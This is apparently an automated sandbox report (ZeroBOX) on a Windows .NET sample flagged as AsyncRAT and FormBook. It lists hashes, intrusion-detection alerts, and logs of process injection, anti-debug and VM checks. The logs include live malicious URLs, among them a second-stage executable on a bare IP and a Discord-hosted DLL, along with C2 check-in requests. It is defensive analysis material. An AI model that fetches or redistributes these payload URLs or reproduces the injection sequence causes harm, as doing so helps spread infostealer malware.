Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 28, 2021, 3:55 p.m.	Sept. 28, 2021, 3:59 p.m.

Size	378.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`59a50d997d0b4a35bfacdea5d1ce1851`
SHA256	`daac858e9ca5b0c8044385c2d94cbef17c41b0bd5c569ad7e03f0a51b4caab7a`
CRC32	`1D7CE695`
ssdeep	`768:LqZLX4yxVoVPS5jGAkq1IB99EXlTwYq0CrCmrmo/w6q5qw74JA:LuoVPiGAkOI+hwYkS`
PDB Path	c:\Users\Administrator\AppData\Local\Temp\2\DTqCJ.pdb
Yara	PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware Is_DotNET_EXE - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT IsPE32 - (no description)

es.exe "C:\Users\test22\AppData\Local\Temp\es.exe"
732
- es.exe "C:\Users\test22\AppData\Local\Temp\es.exe"
  1456

Name	Response	Post-Analysis Lookup
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.135.233
www.fuyrew.online	CNAME shops.myshopify.com A 23.227.38.74	23.227.38.74
www.rlgbsuilds.com	A 166.88.19.180 A 68.68.98.160 A 166.88.19.181	68.68.98.160
www.sadguruenterprisesindia.com	CNAME sadguruenterprisesindia.com A 35.154.60.135	35.154.60.135

IP Address	Status	Action
162.159.134.233	Active	Moloch
164.124.101.2	Active	Moloch
166.88.19.180	Active	Moloch
23.227.38.74	Active	Moloch
31.210.20.22	Active	Moloch
35.154.60.135	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49207 -> 23.227.38.74:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49207 -> 23.227.38.74:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49207 -> 23.227.38.74:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49198 -> 31.210.20.22:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.101:49198 -> 31.210.20.22:80	2019696	ET MALWARE Possible MalDoc Payload Download Nov 11 2014	A Network Trojan was detected
TCP 192.168.56.101:49198 -> 31.210.20.22:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 31.210.20.22:80 -> 192.168.56.101:49198	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 31.210.20.22:80 -> 192.168.56.101:49198	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 31.210.20.22:80 -> 192.168.56.101:49198	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49201 -> 162.159.134.233:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49206 -> 166.88.19.180:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49206 -> 166.88.19.180:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49206 -> 166.88.19.180:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49205 -> 35.154.60.135:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49205 -> 35.154.60.135:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49205 -> 35.154.60.135:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.101:49201 162.159.134.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	54:e1:a7:9d:cc:c8:60:86:f1:a5:da:74:0e:5a:ab:45:df:37:8a:78

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA Sept. 28, 2021, 3:55 p.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW Sept. 28, 2021, 3:55 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 28, 2021, 3:55 p.m.			0	0
IsDebuggerPresent Sept. 28, 2021, 3:55 p.m.			0	0
IsDebuggerPresent Sept. 28, 2021, 3:55 p.m.			0	0
IsDebuggerPresent Sept. 28, 2021, 3:55 p.m.			0	0

This executable has a PDB path (1 event)

pdb_path

c:\Users\Administrator\AppData\Local\Temp\2\DTqCJ.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 28, 2021, 3:55 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://31.210.20.22/xxm/bin.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.sadguruenterprisesindia.com/hp6s/?CPG=dcOC7cI3oFnEfS9GsSVSHnbVWf/igqk97prd+XkG3EO6PgEaTghsJ+vTu1hjJo0Q2PG/bv5y&3f=Yn9ps0vxNLc
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.rlgbsuilds.com/hp6s/?CPG=Fw5YSRn6B6q7Vo6CTsfssUahdbXa4r2ZD7nmGGCHLkY8GDkOmUQxWePCsmLEOuwwrsL9h5YF&3f=Yn9ps0vxNLc
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.fuyrew.online/hp6s/?CPG=2bYopOGPOIVcz7tJsXUx3GFEgu0QV8cVsQS3JlFK1exizYXGI9lPCJa/BJy6fy+FVLDUc5Qt&3f=Yn9ps0vxNLc

Performs some HTTP requests (5 events)

request	GET http://31.210.20.22/xxm/bin.exe
request	GET http://www.sadguruenterprisesindia.com/hp6s/?CPG=dcOC7cI3oFnEfS9GsSVSHnbVWf/igqk97prd+XkG3EO6PgEaTghsJ+vTu1hjJo0Q2PG/bv5y&3f=Yn9ps0vxNLc
request	GET http://www.rlgbsuilds.com/hp6s/?CPG=Fw5YSRn6B6q7Vo6CTsfssUahdbXa4r2ZD7nmGGCHLkY8GDkOmUQxWePCsmLEOuwwrsL9h5YF&3f=Yn9ps0vxNLc
request	GET http://www.fuyrew.online/hp6s/?CPG=2bYopOGPOIVcz7tJsXUx3GFEgu0QV8cVsQS3JlFK1exizYXGI9lPCJa/BJy6fy+FVLDUc5Qt&3f=Yn9ps0vxNLc
request	GET https://cdn.discordapp.com/attachments/888348114673598475/890866414997635092/TNG.dll

Allocates read-write-execute memory (usually to unpack itself) (50 out of 54 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72741000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72742000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00322000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00355000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0035b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00357000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0033c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00346000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00650000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0032a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0034a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00347000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0034b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0033a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 6656 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ed0400 process_handle: 0xffffffff		3221225550
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00651000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00652000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00653000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00654000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00655000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00656000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00657000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00658000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00659000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0065a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0065b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0065c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0065d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0065e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x052f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x052f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x052f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x052f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x052f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x052f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x052f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x052f7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x052f8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x052f9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x052fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x052fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0033d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x052fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x052fd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x052fe000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 732 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x052ff000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 28, 2021, 3:55 p.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 28, 2021, 3:55 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Sept. 28, 2021, 3:55 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (7 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (1 event)

host

31.210.20.22

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 1456 region_size: 192512 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000005e8		3221225496	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 1456 region_size: 192512 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000005e8	1	0	0

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 28, 2021, 3:55 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿáÀº´ Í!¸LÍ!This program cannot be run in DOS mode. $«üêïf¹ïf¹ïf¹ôÍ¹©f¹ôø¹ìf¹ôû¹îf¹Richïf¹PEL]âPà Òðð@ð@.textôÐÒ ` base_address: 0x000c0000 process_identifier: 1456 process_handle: 0x000005e8	1	1	0
WriteProcessMemory Sept. 28, 2021, 3:55 p.m.	buffer: base_address: 0x7efde008 process_identifier: 1456 process_handle: 0x000005e8	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Sept. 28, 2021, 3:55 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿáÀº´ Í!¸LÍ!This program cannot be run in DOS mode. $«üêïf¹ïf¹ïf¹ôÍ¹©f¹ôø¹ìf¹ôû¹îf¹Richïf¹PEL]âPà Òðð@ð@.textôÐÒ ` base_address: 0x000c0000 process_identifier: 1456 process_handle: 0x000005e8	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 732 called NtSetContextThread to modify thread in remote process 1456
NtSetContextThread Sept. 28, 2021, 3:55 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4321424 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000005e4 process_identifier: 1456	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 732 resumed a thread in remote process 1456
NtResumeThread Sept. 28, 2021, 3:55 p.m.	thread_handle: 0x000005e4 suspend_count: 1 process_identifier: 1456	1	0	0

Executed a process and injected code into it, probably while unpacking (20 events)

Time & API	Arguments	Status	Return
NtResumeThread Sept. 28, 2021, 3:55 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 732	1	0
NtResumeThread Sept. 28, 2021, 3:55 p.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 732	1	0
NtResumeThread Sept. 28, 2021, 3:55 p.m.	thread_handle: 0x00000194 suspend_count: 1 process_identifier: 732	1	0
NtResumeThread Sept. 28, 2021, 3:55 p.m.	thread_handle: 0x0000034c suspend_count: 1 process_identifier: 732	1	0
NtResumeThread Sept. 28, 2021, 3:55 p.m.	thread_handle: 0x000005d4 suspend_count: 1 process_identifier: 732	1	0
NtGetContextThread Sept. 28, 2021, 3:55 p.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Sept. 28, 2021, 3:55 p.m.	thread_handle: 0x000000e8	1	0
NtResumeThread Sept. 28, 2021, 3:55 p.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 732	1	0
NtGetContextThread Sept. 28, 2021, 3:55 p.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Sept. 28, 2021, 3:55 p.m.	thread_handle: 0x000000e8	1	0
NtResumeThread Sept. 28, 2021, 3:55 p.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 732	1	0
CreateProcessInternalW Sept. 28, 2021, 3:55 p.m.	thread_identifier: 1204 thread_handle: 0x000005e4 process_identifier: 1456 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\es.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\es.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\es.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000005e8	1	1
NtGetContextThread Sept. 28, 2021, 3:55 p.m.	thread_handle: 0x000005e4	1	0
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 1456 region_size: 192512 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000005e8		3221225496
NtAllocateVirtualMemory Sept. 28, 2021, 3:55 p.m.	process_identifier: 1456 region_size: 192512 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000005e8	1	0
